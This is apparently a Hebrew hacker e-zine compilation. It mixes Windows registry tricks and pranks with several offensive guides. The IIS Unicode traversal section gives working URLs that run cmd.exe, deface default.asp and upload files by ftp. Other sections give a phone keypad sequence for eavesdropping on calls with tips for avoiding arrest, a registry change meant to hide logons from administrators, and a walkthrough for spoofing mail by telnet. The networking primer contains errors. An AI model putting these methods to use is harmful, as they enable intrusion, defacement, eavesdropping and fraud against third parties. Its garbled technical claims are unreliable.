נכון שה CD ROM שלך מפעיל קבצים אוטומטית ?  רוצה להפסיק את זה?

ובכן גש לעורך הרג'יסטרי שלך והכנס לתיקייה הבאה:

 

HKEY_CURRECT_USER\Sofware\Microsoft\Windows\CurrectVersion\Policies\Explorer

 

שנה את הערך שנמצא ב NoDriveTypeAutoRun ל :
BD 00 00 00

עכשיו הדיסק לא יפעל בצורה אוטומטית (כנראה שתצטרף להפעיל את המחשב מחדש כדי שהשינוי יתרחש) . ד"כ לצורך הגיבוי ברוב המערכות המידע ששינית ממנו היה

 95 00 00 00

 

 

 

יצירת תצוגה ממוזערת של קבצי BMP

הנה טריק נחמד ולא מזיק במיוחד . נכון ש ICONS אתה רואה כמו שהם – מה שאתה רואה זה האייקון , אז כך גם אפשר לעשות לקבצי BMP – איך ?
לך לעורך הרג'יסטרי והכנס ל:

HKEY_CURRECT_ROOT\PAINT.PICTURE\DefaultIcon

ושנה את הערך שנמצא ב תווית Default ל %1

אישית אני חושב שזה טריק נחמד במיוחד.

 

תפריטי טורבו

את זה אני בטוח שתאהב, תלחץ על "התחל" ועכשיו על "תוכניות" נגיד... התפריטים עלים במהירות איטית ומעצבנת – בוא תהפוך אותם למהירות טורבו :

הכנס לעורך הרג'יסטרי והכנס ל:

HKEY_CURRECT_USER\CONTROL PANEL\ DESKTOP

בתוך DESKTOP הכן מפתח String Value חדש (ע"י לחיצה על מקש ימני בתוך החלון הימני ובחירת String Value ) – וכתוב בשם שלו (לא הערך ! )   MenuShowDelay

בתוכו שים את הערך 10 או ערך נמוך מזה (כל ערך שווה למספר מיליוניות השנייה שהמחשב יחכה עד שהוא יפתח את התפריט הבא) ע"י לחיצה כפולה על התווית שיצרת.. התחל את המחשב ובפעם הבאה שתכנס לתפריט הוא יטוס לך...

 

שינוי הכותרת בחלון Internet Explorer

אם תפעיל את הדפדפן  Explorer תראה שכתוב בכותרת Microsoft Internet Explorer ניתן לשנות זאת ע"י כך :

הכנס לעורך רג'יסטרי בתיקייה :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main  

פתח STRING VALUE חדש וקרא לו בשם window title בתוכו שים את הטקסט אותו אתה רוצה שיופיע.

 

לשנות את כפתור "התחל" והאייקון שלו (למתקדמים)

זה די מסובך למתחילים , אם אין לך ידע בבסיסים הקסדצימליים אז תלמד קצת כי המדריך הזה דורש ידע כזה (ניתן למצוא במדריכים שלי) .

אני חושב שלשנות את הכפתור של "Start" זה דבר מאוד נחמד. יאללה בוא נתחיל:

לשנות את הכיתוב:

גבה את EXPLORER.EXE מתיקיית WINDOWS

לאחר שגיבית אותו בתיקייה מסוימת (שאותה תדע למצוא דרך DOS אם הוא ילך לך חס וחלילה) פתח לו את הצורה באמצעות עורך הקסדצימלי כלשהוא. לך לכתובת HEX

02DF0E

שם תראה את זה: 53 00 74 00 61 0 72 00 74

שזה אומר Srart (תרגום לאסקי) וכל ספרת ה 00 מציינים רווח בין האותיות (רווח תיאורטי במערכת ההפעלה אין רווח בין האותיות!) . שנה את הערכים לאיזה אותיות שאתה רוצה... (בהתאם להמרת ה ASCII לבסיס הקסדצימלי.

עובד במערכת אנגלית , אין לי מושג איך זה בעברית...

 

לשנות את האייקון:

גבה את USER.EXE מתיקיית WINDOWS

עכשיו לך לעורך אייקונים כלשהו שיכול לקרוא EXE ופתח בו את הקובץ , שנה אותו למה שתרצה. משהו חשוב גודל האייקון צריך להתאים לגודל המסך – תנסה לשחק עם זה קצת...

להעיף מיקומי תוכניות מ "הוספה \ הסרה"

אתה עושה UNINSTALL למשחק \ תוכנה אבל כנראה שאתה אוטיסט ולא עשית את זה כמו שצריך :) כנקמה על כך (חחח) WINDOWS תקעה לך את התווית של זה בלוח הבקרה בתוך הוספה\ הסרה . רוצה להעיף את זה ? אין בעיה...

לך ל:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

ומחק כל מיקום לא רצוי.

 

תפריט "שלח אל"

טוב אני לא מחדש שום דבר... נכון שאתה לוחץ על הלחצן הימני במקום כלשהו יש לך תפריט שנקרא "שלח אל" או באנגלית SendTo ...

בשביל לשנות את המקומות שבפנים למה שבא לך לתיקייה SendTo בספריית המערכת WINDOWS ושנה את מה שאתה רוצה – התיקייה יכולה להיות גם מוסתרת

 

שינוי שם "סל המחזור"

רוצה לקרוא לסל המחזור איך שבא לך – "פח זבל" , "אח שלי" ומה שאתה רוצה...

לך ברג'יסטרי ל:

HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}

ושנה את השם שמופיע ב Default

 

מסכי פתיחה \ סגירה של המחשב

טוב תזהר עם השטות הזאת כי היא הורסת לפעמים את הגרפיקה של ההתחלה...

בתיקיית WINDOWS  שלך ישנם קבצים שאתה יכול לפתוח עם "צייר" ולשנות אותם למה שאתה רוצה... אל תשכח לגבות לפני! (הקבצים יכולים להיות גם מוסתרים)

logo.sys – מסך הפתיחה של המחשב

Logos.sys – מסך "כעת בטוח לכבות את המחשב"

Logow.sys – מסך הכיבוי של המחשב

 

צור עותקים לתפריטים מקומיים

דבר אדיר , שכל משתמש צריך לדעת ובזה אני סוגר את הטיפים למדריך זה...( מה כבר נגמר ?! אבל היה כזה נחמד ... אווווו.....)

 

צור תיקייה חדשה וקרא לה כך:

Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}

 

הופה הופה ! מה אני רואה כאן... היא נראית בדיוק כמו "לוח הבקרה" ...עשה אתה מה שאתה רוצה כעת...

 

אותו דבר ניתן לעשות גם לדברים אחרים כדוגמת :

חיוג לרשת :

Dial Up Net.{992CFFA0-F557-101A-88EC-00DD010CCC48}

מדפסות:

Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}

 

 

סיכום:

במדריך זה למדת כמה טריקים נחמדים למערכת ההפעלה שיכולים לייעל את השימוש שלך בה.

כמובן שאם אתה לא יודע איך להשתמש בטריקים הרסת לעצמך את המערכת כמה פעמים :)

 

מקווה שנהנית

Zeos

Windows Tricks Part 2

 

הממ אני שמח שאתם קוראים את זה, כי זה מדריך עם שטויות בוינדוס להריץ על חברים,

שהם מעצבנים אתכם, ליימרים, וכאלה שכיף לעשות להם באסה בלב.

 

1. כיבוי מהיר, בלי בקשות ובלה בלה.

פשוט פקודה שמכבה את המחשב.

C:\windows\rundll.exe user.exe,exitwindowsexec

 

2. לבטל את אפשרות הכיבוי מתפריט התחלה.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

מחפשים

NoClose Key

אם הוא לא נמצא תיצרו

 

ע"י

 New > String Value.(Name it NoCloseKey)

 

עכשיו, שימו לו ערך 1. כאשר ערך 1 פעיל אז הוא האפשרות כיבוי מבוטלת.

רוצים לעשות את זה יותר מהר ?

REGפיתחו קובץ חדש עם סיומת

++

 

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoClose"="1”

 

++

 

והפעילו אותו כמובן.

 

3. למחוק את הטיפים של הוינדוס כדי לחסוך כמה קילו בייטים מסכנים.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips

פשוט בחרו את הטיפים ומחקו אותם ע"י מקש מחיקה.

 

4. למחוק תפריטים מסוימים בתפריט התחל

Run לדוגמה

 

הולכים ל

Regedit

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

New > Dword

Name > NORUN Value > 1

NOFINDכמו כן

הלך גם קיצור הדרך להגיע לשם דרך המקשים של המקלדת.

 

כדי להחזיר למצב מה עושים, שמים לדבר החדש שעשיתם ערך 0 או מוחקים אותו.

 

5. (בשביל האקרים). ביטול ההצגה של המתחבר האחרון לרשת בוינדוס נ.ט 5  .

 

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon

Name > ReportBookOK Value > 1

 

כדי לבטל מוחקים אותו או שמים ערך 0.

-- זה טוב כדי שהאדמין לא ידע אם אתם התחברתם אחרונים ועשיתם משהו לא טוב ברשת.

 

. הממ אני לא בטוח שזה עובד בגיסראות החדשות של נ.ט. 6  אבל תנסו.

ביטול מסך בדיקת סיסמא בהפעלת הוינדוס נ.ט. .

 

Regפוצחים קובץ

DISABLE.reg

 

----

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network]

"DisablePwdCaching"=dword:00000001

----

 

By Zeos

Razor - תיקונים


 

WAP - Wireless Application Protocol.

מה במדריך זה ?

* מהו WAP ?

* רשימת הפלאפונים על פרוטוקול ה - WAP !!

* איך אפשר לנצל את זה ??!

* איך להיזהר לא להיתפס !!

* מושגים קשורים לנושא !!

* קרדיטים !!

 

מהו WAP ?

=========

ראשי התיבות של WAP הוא - Wireless Application Protocol.

הוא בעצם פרוטוקול תקשורת אשר נותן למכשירי פלאפון מידע כמו קו דיגיטלי ולא אנלוגי.

& רשת אנלוגית היא רשת פשוטה אשר לא מתוחכמת כמו שהטכנולוגיה עכשיו

&& רשת דיגיטלית הרבה יותר מתקדמת ויש בה הרבה יותר ישומים אפשריים.

ה-WAP משמש מכשיר פלאפון רגילים וגם טרמינלים של רשת פלאפון כלשהי.

&&& הוא גם משמש לישומי אינטרנט אפשריים.

כל המכשירים אשר כוללים את ה- WAP אמור להיות עליהם לוגו כזה - MMM.

MMM - Mobile Media Mode. ומידע את הלקוח שהמכשיר שלו פועל בפרוטוקול הנ"ל.

 

רשימת הפלאפונים על פרוטוקול ה - WAP !

=====================================

הנה רשימה של מכשירים אשר עובדים על WAP :

Alcatel OneTouch

Benefon Q WAP+HTML

Benefon Twin Dual SIM

Ericsson R320

Ericsson R380

Mitsubishi Trium Geo WAP   

Motorola Timeport L7389

Motorola v2288

Motorola Talkabout (T2288)

Nokia 6210

Nokia 6250

Nokia 7110

Panasonic GD 93

Siemens S35i

Siemens M35i

Siemens C35i

Sony CMD-Z5

 

והנה רשימה של פלאפונים ממש ממוחשבים כמו מין פלאפון שהוא גם מחשב אישי.

Ericsson MC218

Nokia 9110 Communicator

Siemens IC35

 

איך אפשר לנצל את זה ?

=====================

 

אפשר לצוטט למכשירים הנ"ל מפלאפון אחר אשר תומך בפרוטוקול.

דוגמא:

ממכשיר אריקסון אפשר לצוטט למספרי טלפון אחרים, מה הבעיה פה ?

שאתה לא יכול לבחור מספר שאתה רוצה ואתה לא יכול להצטרף לשיחה כצד שלישי.

איך עושים את זה ?

אתה לוקח את המכשיר שלך ועושה ככה:

904059, Menu, yes, 1, Rcl, yes, 8300**, yes, 86.

במקום שתי הכוכביות אתה יכול שים את כל סדרי הספרות חוץ מ 00.

כדי לצאת מהמצב הזה אתה עושה : Rcl, 3, YES (אם אני לא טועה).

אתה תשמע מישהו מדבר אתה לא תוכל לעשות כלום כדי להפריע לו או משהו כזה.

אולי יהיה לך מזל ותשמע שיחה מהנה או שיחה שמועברים בה נתונים אישיים או חסויים וכו'.

 

איך להיזהר לא להיתפס !

======================

1. החוק הכי חשוב לא לעשות את זה כל שניה ושניה ואלף חמש מאות פעמים ביום,

   פעם בכמה זמן אם משעמם לכם.

2. על תישארו על הקו יותר מחמישים שניות בפעם אחת,בציתות אחד אני מתכוון.

3. אל תדברו בקול על זה שאתם מצותתים וכו' בחוץ כי אם איזה שוטר סמוי ישמע אותכם, u busted.

4. תנסו כמה שיותר לא לעשות את זה מהמכשיר שלכם או ממכשיר של קרוב משפחה,

   כי אם עולים עליכם עד שהם ירעענו נתונים ויבואו לקחת את מי שעה את זה,

   הם לא יגיעו אליך אלא אל מי שעשיתם את זה ממנו.

5. לא להיתפס.

 

מושגים קשורים לנושא !!!

=======================

WML: שפת טקסט של רשת אלחוטית במיוחד לפרוטוקול זה (WAP).

htm: שפת טקסט דיגיטלית.

TeleVAS: מערכת טלפונים אשר תוספים לה סרביסס למיניהם.

 

קרדיטים !!!

===========

קודם כל תודה למשפחתי האהובה שנתנה לי את הסיכוי לכתוב טקסט זה.

אחרי זה אני מודה לאלוהים על כך שנתן לי ידיים, רגליים וכו'.

חחח סתם סתם.

יש פה קרדיט לחבר ותיק שלי, פריקר כבר הרבה זמן - PhoneL0V3r.

תודה מיוחדת לו על שעזר לי בכתיבת מדריך זה. ולאתר www.astalavista.com.

 

By Pirs[i]ng

Razor - תיקונים


 

פריצה לאתרים בעזרת יוניקוד

 

מבוא

יוניקוד הוא באג שנמצא בiis 4.0/5.0   שהם שרתי ה web  של winNT/win2k  הבאג מאפשר לתוקף להפעיל פקודות דוס מרחוק.

 

קצת היסטוריה

לפני כמה שנים (בתקופה שאני ישבתי ב bbs  והורדתי משחקים של ילדים אינפנטילים התגלה ב iis 3.0  ונראה לי גם ב 2.0 באג שניקרא double dot

הוא נתן לאנשים לראות איזה ספריות שם רוצים פשוט על ידי

זה שהם רשמו משהו כזה:

www.someserver.com/..\..

 

מיקרוסופט שיחררה פאטצ אבל עקפו אותו בקלוט על ידיד זה שתרגמו את ה

.. לכתב של הדפדפן

אתם בתח שואלים למה אני מספר לכם את זה . ובכן למי שלא ידע יוניקוד זה בכלל פורמט לכתיבת טקסט . ולמי שעדיין לא מבין יוניקוד הוא גילגול חדש (ושונה קצת) של הדאבל דות שבו מתרגמים את ה / לתבנית יוניקוד.

יוניקוד תומך בשפות שונות זה טיפה מסבך את הניצול של הבאג אבל בזה אני אדון בהמשך.

 

 מתאיםIss מציאת שרת

כדי לבדוק אם שרת מסויים הוא 

 iss4.0/5.0

עליך לעשות טלנט לפורט 80 ולרשום שם

HEAD /

 

ואז ללחוץ פעמיים אנטר אם זה

iss

זה ירשום כזה דבר

HTTP/1.1 501 Not Supported

Server: Microsoft-IIS/4.0

Date: Fri, 16 Mar 2001 15:30:36 GMT

Content-Type: text/html

Content-Length: 121

 

אתם שמים לב ל

iss/4.0

?

אם לא אז אתם עוורים

 

 

 

(exploit) הניצול

טוב נתחיל עם הניצול הפשוט ואחרי זה נפרק אותו

אחרי שמצאתה שרת מתאים אתה יכול לפתוח חלון באקספלורייר ולרשום את הדבר הבא

http://www.ServerName.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\

 

טוב

servername

די מסביר את עצמו

נעבור לדבר הבא

scripts

זאת הספריה שבה השרת מאכסן את  ה

cgi

שלו במקום סקריפטס יכולים לבוא הדברים הבאים

 

sampels

cgi-bin

_vti _admin 

_vti _bin

msadc

 

 

..%c1%9c..

זה התרגום של יוניקוד בגלל שני קוד תומך בהרבה שפות יש גם המון תרגומים שונים שיכולים לעבוד במקומו

הינה רשימה קטנה

..%c1%1c..

..%c0%9v..

..%c0%af..

..%c0%qf..

..%c1%8s..

..%c1%9c..

..%c1%pc..

 

 

/winnt/system32/cmd.exe?/

החלק הזה צריך להיות קבוע הוא מוביל אותך אל קובץ

cmd.exe

שהוא הקובץ שמפעיל קובצי

*.bat and *.cmd

שהם קבצים שמכילים אוסף של פקודות בדוס שאותם

cmd.exe

מריץ אחת אחרי השניה

 

 

**********************************************************

טיפ: למי שרוצה לדעת עוד קצת על זה יכול למצוא ב

blacksun.box.sk

מדריך על

batch programming

***********************************************************

 

/c

זה אות הכונן שיושב עליו האתר זה עלול להישתנות

 

ועכשיו לקטע המעניין

+dir+c:\

 

 זאת בעצם פקודה בדוס שמראה את התוכן של

c:\

ה + משמש להפריד בין פרמטרים שונים במקום רווח

יש עוד די הרבה פקודות אבל יש שתיים  שאני רוצה להיתעכב עליהם

הראשונה היא

echo

בשימוש נכון הפקודה הזאת יכולה להכניס טקסט לקבצים וליצור קבצים

אבל כשמנסים לעשות את הדבר הבא (שאמור להכניס טקסט לקובץ) :

 

http://victim.machine/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+Dfaced+>>+c:\inetpub\wwwroot\default.asp

 

 

זה לא פועל

מה שצריך לעשות זה להעתיק בעזרת

copy

את

cmd.exe

ל

c:\Inetpub\scripts

ואז יהיה אפשר לעשות את זה על ידי

http://www.hackmel.co.il/scripts/cmd.exe?/c+echo+blablabla+>>+c:\test.txt

 

הפקודה השניה שאני רוצה להסביר עליה היא

ftp

אם אתם רוצים להעלות קובץ אתם צריכים ליצור בעזרת

echo

קובץ שמכיל את כל הפקודות אפ טי פי שאתם רוצים להשתמש בהם ואז להפעיל את הפקודה


www.serv.com//scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ftp+-s+c:\commands.txt

 

By y0g1-b3ar

 

 

המדריך המקיף על ה-"טרוייני"

ועכשיו בואו נתחיל.

טרויינים הם בעצם קבצים שמטרתם לפתוח שרת על המחשב שלכם ולהפעיל שרת זה כל פעם שמחשבכם עולה.

 

איך זה בעצם פועל?

ברגע שאתה פותח את הקובץ שנשלח אליך (בד"כ *.exe)

נפתח אצלך במחשב שרת[SERVER] על פורט מסויים שמתכנת הטרוייני קבע

ואתה בד"כ לא יודע מזה.. כי הטרויינים בנויים ככה שלא תדע שאתה נדבקת בהם

למשל.. אתה תפתח את הקובץ של הטרוייני ויפעל לך משחק קטנטן ואתה לא תחשוד בכלום..

אבל בעצם באותו זמן יותחל הטרוייני על המחשב

או שלמשל תקבל הודעת שגיאה כאילו היה בעיה עם הקובץ ובעצם ברגע זה נדבקת בטרוייני אכזרי

ויש גם כאלה שברגע שאתה לוחץ עליהם.. ולכאורה שום דבר לא קורה..

אבל ברגע זה כבר אתה נגוע בטרוייני והילד ששלח לך את הקובץ כבר בתוך המחשב שלך מוריד ממך קבצים

 

ואחרי שנדבקת בטרוייני.. כל מי שיש לו לקוח[CLIENT] מתאים.. יכול להכניס את האי פי שלך בתור שרת.. את הפורט של השרת ולהתחבר אליך למחשב

ובעזרת פקודות שהאיש שתכנת את הטרוייני קבע אפשר לעשות לך הרבה דברים, כמו:

גניבת סיסמאות, כניסה לסיפריות, כיבוי מחשב, לראות סיסמאות, לראות תמונות של המסך שלך,

לפתוח ולסגור את הסידי-רום, לשלוט בעכבר, להפעיל תוכניות, לשלוח הודעות, והרבה הרבה יותר.

 

אחד הטרויינים הפופולריים ביותר בעולם הוא באק אורפיס[BACK ORIFFICE] שתוכנת ע"י cDc

והוא כל כך פופולרי, כי הוא מאפשר גישה גם למערכות Win NT

וגם קוד המקור שלו שוחרר, ולכן זה עושה אותו אפילו יותר מסוכן.

 

פתרונות

```````

* אל תקבל קבצים מאנשים שאתה לא מכיר.. ואם הקובץ נראה לך חשוד.. מחוק אותו ישר!

* ישנה תוכנה נהדרת שנקראת "The Cleaner" שמוצאת טרויינים במחשבך ומוחקת אותם

* עדכן את האנטי ווירוס שלך כל שבוע

* אתה יכול לפתוח את הקובץ לפי שהפעלת אותו דרך הדוס ולחפש מילים חשודות כמו: sock \ port \ winsock \ server או כל מילה אחרת שנראת לך שיכולה להיות חשודה

(כדיי לפתוח קובץ בדוס: פתח את הדוס > כנס לסיפירה של הקובץ > ולחץ edit filename.exe)

דעתי האישית

לדעתי טרויינים זה לא נקרא פריצה כי אתה לא באמת פורץ. אתה רק מנצל אנשים תמימים. וגם אתה לא לומד מזה כלום,

וזה ישאיר אותך באשליה שפריצה זה משחק ילדים ושזה קל.

אם אתה באמת רוצה לדעת איך דברים פועלים ואיך לפרוץ ולאבטח דברים..

אני ממליץ לך להכנס לאתרים של אבטחה ופריצות וללמוד ולקרוא טקסטים! והרבה! כי בסך הכל ידע זה כח.

--

אתם יכולים להגיב\להעיר\לשאול שאלות בפורום.. ואני ישמח לענות

ואני מקווה שעזרתי לכם להבין מה זה בעצם טרוייני ואיך הוא פועל

By Rul3r

 

סאבנטינג

 

מה זה סאבנטינג ? רוצים לדעת ? תמשיכו לקרוא.

מספר דברים שכדאי לדעת לפני הקריאה :

ARP list - list of the all MAC (media access control) Numbers.

RIP list - list of all the Routers.

DefaultGateWay - the input chip of the Router.

כל חומר הכתוב פה הוא למטרות לימודיות בלבד ואין לעשות בו כל פעולה שהיא נגד החוקף

לא שיש מה לעשות אבל בכל מקרה.

אני נותן מבט בסיסי כדי שתוכלו להכיר את הרשת שעליה אתם עובדים או ****** אליה.

 

עכשיו אני אתן לכם מבט בסיסי על הנושא שנקרא סבנטינג:

סבנטינג: חלק מהרשת , יכול להיות רשת פיזית עצמאית בפני עצמה,

המטפלת ב"פלח" מסוים מהבנה של הרשת השלמה,

בדרך כלל רשת שכזו חולקת תת כתובת של הרשת השלמה עם שאר הרשתות המישניות.

אנא הביטו בתרשים הבא:

 _    _    _    _

|4|   |3|    |2|  |1|

 _

|5|

 _    _    _    _

|6|    |7|   |8|   |9|

 

למשל אנחנו רוצים לשלוח משהו ממחשב 3 למחשב 8 באופן ישיר.

אם נעשה את זה בדרך הרגילה אז זה יקח זמן, עד שכל מחשב יאשר וכו'.

אבל מה יקרה אם נעשה את זה עם סוד שידור אחר ?

כמו Unicast למשל ?

אתם שואלים מה זה ? Unicast הוא סוג של שידור אשר לא יעביר הכל דרך כל המחשבים,

אתם אומרים לו תשלח דאטה למחשב 8 ממחשב 3 הוא יעשה זאת ללא מעבר דרך המחשבים: 4,5,6,7.

סוג השידור הזה לא עובד אם פרוטוקול NetBuei, כי TCP/IP  לא עובד אם אותיות, מספרים בלבד.

(אם אתם לא מכירים או הפרוטוקול רוצו ללמוד במדריך הקודם שלי).

עכשיו, ראוטר (Router) הוא נתב , התקן חומרה המנתב הודעות ואינפורמציה ברשת בהתאם לצורתם.

ראוטר הוא לא פריט זול, הוא עולה כ- 10,000 דולר בחו"ל.

הראוטרים טובים ביותר הם של החברה "סיסקו".

 

עכשיו נעבור לפירוק האיפי (IP) לשני גורמים,

NetWork Id, Host Id.

חוקים לאיפי, אסור שיתחיל ב 127, אסור שיסתיים ב- 0, 225.

127.0.0.1 הוא גם מחוץ לטווח. אם אתם לא יודעים למה אז תבררו ואז תמשיכו לקרוא.

איך נזהה באיפי מה הוא ה - Network, Host , ID.

הכל מתחלק ל3 קבוצות עיקריות: (subnet mask)

דוגמא : Ip: Z.Q.W.X

 

           Z     Q     W     X

------------------------------

class a: | N | | H | | H | | H |

------------------------------

class b: | N | | N | | H | | H |

------------------------------

class C  | N | | N | | N | | H |

------------------------------

Subnet Mask - היא מראה מה זה מה, מה מהם הנטוורק אידיי, ומה ההוסט אידי ומבדילה ביניהם.

עכשיו נעבור לזיהוי ל איפי ללא ה- SUBNET MASK.

 

         =========================================

class a: | 1 | | 1-127   | | 126     | | 16777214|

         =========================================

class b: | 10| | 128-191 | | 16384   | |  65534  |

         =========================================

class C  |100| | 192-223 | | 2097152 | |  254    |

         =========================================

דוגמא:

155.25.69.41 - Class B (quz 155 is between 128-191[class B])

215.25.69.41 - Class C (quz 215 is between 192-223[class C])

62.25.69.41  - Class A (quz 62  is between 1-127[class A])

377.2.3.5 - Not allowed (quz 377 is out of limit !)

213.2.2.0 - Not allowed (quz IP numbers rn't allowed to end with a 0!)

 

מבינים, אם כן יופי, אם לא אז תקראו בסוף זה יקלט , אני מקווה .

והנה עוד כמה מושגים שכדאי לדעת לעובדים ברשת !

 

Switch - התקן רשת הקובע את נתיב "חבילות&quuot; הנתונים אל יעדיהן ברשת,

קובע את יעד חבילות המידע בתוך הרשת.

 

Dynamic IP - סוג אי פי נימרץ , הנפוץ ביותר קיום בעוולם,

כל פעם כאשר מתחברים לרשת מסוימת נקבע אי פי חדש ושונה,

הבעיה בסוג הזה של האי פי הוא שזיהוי של משתמשים,

קשה ובילתי יציב, לא ניתן להיסתמך על נתונים מכוון שכשיתחברו מחדש הנתונים ישתנו.

 

Static IP - סוג אי פי נייח ולא דינמי, פחות נפוץ בייותר קיום ,

מובנה ברוב טכנולוגיות התקשורת החדשות, חיבור הוא היציב ביותר והקל ביותר מבחינת זיהוי,

משתמש שהתחבר לרשת ישאר עם אותו אי פי לעולם,

לכל מחשב יש אי פי אחד או יותר שמובנים עליו ורק בהם הוא יכול להשתמש.

 

אז אנו מקווה שנהניתם ואנחנו יודעים שאתם בטח אומרים בלב בואנה זה חומר משעמם,

אולי הוא משעמים אבל הוא חשוב לכל מי שרוצה להתעסק ברשתות.

רק שתדעו, חצי מהחומר פה מופיע במבחן הגמר של קורס של מיקרוסופט .

 

By PirsiNg & Zeh

 

דואר אנונימי דרך טלנט

 

אני יודע שהיום יש תוכנות שעושות את זה, אבל תמיד טוב לדעת שיטות נוספות.

שרת smpt הוא שרת שאחראי על דואר יוצא ודרכו אפשר לשלוח דואר אלקטרוני

(פורט ברירת המחדל שלו הוא 25).

וככה זה עובד:

 

1.מתחברים לשרת דואר יוצא 

  telnet netvision.net.il 25

  או כל שרת דואר אחר.

 

2.ואלו הפקודות:

HELO - או OLEH  מזהה אותך לפני השרת וקובע שאתה המקור של השליחה.

NOOP -   פעולה שלכאורה לא עושה כלום אבל היא בעצם מחזירה פלט מהשרת אליך וככה אפשר לבדוק אם אתה  עדיין מחובר ומה המהירות של החיבור בינך אל השרת.

QUIT -  אני חושב שזה דיי ברור... (מתנתק מהשרת)

HELP - [topic] עזרה בקשר לפקודה מסויימת.

HELP -   יציג רשימה של הפקודות שניתנות לשימוש בשרת. (בד"כ דומה ברוב השרתים)

RSET -  - מוחק את כל מה שהכנסתם עד עכשיו, כתובת שולח וכדומה

MAIL FROM - :<address> כתובת השולח

DATA -   מכניס את התאריך של כתיבת הדוא"ל ופותח את גוף המכתב.

ATUH - - שולח את המכתב.

VRFY - בודק אם המשתמש קיים בשרת. דוגמא: -  vrfy Rul3R

RCPT TO:<recipient> - כתובת היעד (ניתן לרשום את הפקודה הזאת יותר מפעם אחת ובכך לשלוח ליותר מאיש אחד).

 

איך לגלות אם קיבלתם דואר מזוייף?

תסתכלו ב

headers

של הדואר ואז אתם רואים את האי פי של מי ששלח אז תסתכלו על

הכתובת של מי ששלח ותראו שזו לא אותה הכתובת.

 

הערות:

+כל הפעולות שלכם נרשמות , כולל למי אתם שולחים את האי פי שלכם וכל השאר.

+בד"כ אם אין פעילות ברוב שרתי הדואר תוך 60 שניות הקשר ינותק

+היום יש תוכנות שעושות את זה.

+רצוי לעשות את זה מאחורי פרוקסי

+לא כדי להשתמש בתוכנות כי לרוב הן לא נותנות להתחבר עם פרוקסי

 

 

רשימה של שרתי דואר:

newmail.net:25

mail.yahoo.com:25

mail.hotmail.com:25

mail.surfree.net.il:25

out.inter.net.il:25

mail.airmail.net:25

mail.geocities.com:25

mnsi.net:25

hacker.com:25

mail.iaw.on.ca:25

pdx.sisna.com:25

jaring.my:25

chollian.dacom.co.kr:25

all-yours.net:25

 

plix.com:25

ids.net:25

student.uq.edu.au:25

istar.ca:25

total.net:25

mail.tfs.net:25

ecis.com:25

mindspring.com:25

popmail.uc.edu:25

mail.atcon.com:25

future.net:25

aloha.net:25

ovnet.com:25

connect.reach.net:25

valley-internet.net:25

valleynet.com:25

milo.cfw.com:25

scs.august.com:25

hiwaay.net:25

 

 

הערה :25  זה לא חלק מהשם זה הפורט

 

לוג לדוגמה: מה שכתוב בתוך ה /* */ זה הערות שלי

---

Connected to netvision.net.il on port 25 /*מתחבר לסרבר של נטוויז'ן*/

220 ftp.netvision.net.il ESMTP Sendmail 8.9.3/8.9.3; Mon, 2 Apr 2001 18:47:18 +0200 (IST) /*מקבל תאריך מלא וגירסא של שרת האימייל שלהם*/

helo ihc /*מזדהה בשם ihc*/

250 ftp.netvision.net.il Hello diup-205-209.inter.net.il [213.8.205.209], pleased to meet you /*מקבל תגובה עם האייפי שנקלט במערכת שלהם*/

help /*שולח בקשה לעזרה ולראות את כל הפקודות*/

214-This is Sendmail version 8.9.3 גירסא /*של התוכנה שהשרת מריץ*/

214-Commands: /*מקבל את כל הפקודות*/

214- HELO EHLO MAIL RCPT DATA

214- RSET  NOOP QUIT HELP VRFY

214- EXPN VERB 

214-For more info use "HELP <topic>".

214-To report bugs in the implementation send email to

214-                                        [email protected].

214-For local information send email to Postmaster at your site.

214 End of HELP info /*סיים לקבל את הפקודות*/

mail from: <[email protected]> /*אומר לשרת את הכתובת אימייל שאני רוצה לשלוח ממנה*/

250 <[email protected]>... Sender ok /*מקבל אישור מהשרת*/

rcpt to: <[email protected]> /*אומר לשרת למי אני רוצה לשלוח*/

250 <[email protected]>... Recipient ok /*מקבל אישור מהשרת*/

data /*שולח פקודה דאטא*/

354 Enter mail, end with "." on a line by itself /*מקבל תגובה מהשרת שאומרת לשים נקודה בסוף ההודעה*/

subject: test /*קובע את נושא ההודעה*/

 

hey man /*כותב את ההודעה*/

whats up?

ihc r0x

. /*כותב נקודה כדיי להגיד לשרת לסגור את ההודעה*/

250 SAA05248 Message accepted for delivery /*מקבל אישור מהשרת שההודעה נשלחה*/

noop /*שולח פקודה "נופ" כדיי לראות שאני עדיין מחובר*/

250 OK /*מקבל תגובה מהשרת וככה אני יודע שאני עוד מחובר*/

vrfy ihc /*בודק אם יש בשרת משתמש בשם ihc*/

252 Cannot VRFY user; try RCPT to attempt delivery (or try finger) /*מקבל תגובה שלישית מהשרת שאומרת שאין כזה משתמש*/

quit /*שולח פקודה יציאה מהשרת*/

221 ftp.netvision.net.il closing connection /*מקבל הודעת יציאה מהשרת*/

Disconnected from netvision.net.il /*החיבור נותק*/

 

By VoRtex

Rul3rתיקונים ותוספות


 

Shellחשבונות

 

הקדמה:

======

המדריך הזה נכתב אחרי מאות בקשות של אנשים שרוצים לדעת מה זה לעזאזל שאלל, לשם מה הוא נועד, איך משתמשים בו ולמה הוא טוב בכלל; על כל זה נרחיב במדריך הנ"ל.

 

מהו חשבון שאלל?

===============

חשבון שאלל הוא בעצם סקריפט, שהלקוח [אנחנו], מתחברים אליו בעזרת טלנט פשוט...

